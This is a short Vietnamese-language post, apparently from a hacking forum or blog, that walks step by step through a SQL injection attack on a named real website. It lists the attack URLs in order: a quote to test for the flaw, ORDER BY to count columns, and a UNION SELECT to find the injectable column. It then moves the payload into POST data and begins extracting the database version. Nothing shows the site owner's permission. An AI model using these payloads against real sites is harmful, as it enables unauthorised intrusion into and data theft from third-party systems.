Bài liên quan
Đầu tiên chúng ta cùng nhìn site này

Mã PHP:
http://www.hometheater.co.il/modules.php?name=Sale&op=ViewCatg&id_catg=206 

Bước 1: Check lỗi

Mã PHP:
http://www.hometheater.co.il/modules.php?name=Sale&op=ViewCatg&id_catg=206' 

[Hình: data487c4.png]
Giao diện website có thay đổi. Chứng tỏ site bị lỗi.


Bước 2: Tìm số trường cột


Mã PHP:
http://www.hometheater.co.il/modules.php?name=Sale&op=ViewCatg&id_catg=206 order by 2-- - 

[Hình: data2.jpg]
Giao diện website vẫn bình thường


Mã PHP:
http://www.hometheater.co.il/modules.php?name=Sale&op=ViewCatg&id_catg=206 order by 3-- - 

[Hình: data1.jpg]
Giao diện website thay đổi

Số trường cột cần tìm là 2

Bước 3: Xác định vị trí trường cột bị lỗi

Mã PHP:
http://www.hometheater.co.il/modules.php?name=Sale&op=ViewCatg&id_catg=206 and 0 UNION SELECT 1,2-- - 

[Hình: data3.jpg]
Không tìm thấy cột lỗi

Sau khi thử mọi cách bypass mà vẫn chưa tìm ra kết quả nên mình chuyển qua phương pháp Post data bằng cách đem: id_catg=206 and 0 UNION SELECT 1,2-- -xuống như trong hình:

[Hình: data6.jpg]

Sau đó nhấn chữ Execute thì chúng ta sẽ có kết quả 

[Hình: data4.jpg]
Lỗi cột 1

Tiếp theo chúng ta tìm version

[Hình: data5.jpg]
....

P/S: Vì không biết nên đặt tiêu đề như thế nào cho đúng nên nếu sai tiêu đề thì rất mong các bạn thông cảm.

Nguồn CEH

Post a Comment

 
Top

Nhận xét mới đăng tải!

Loading…
X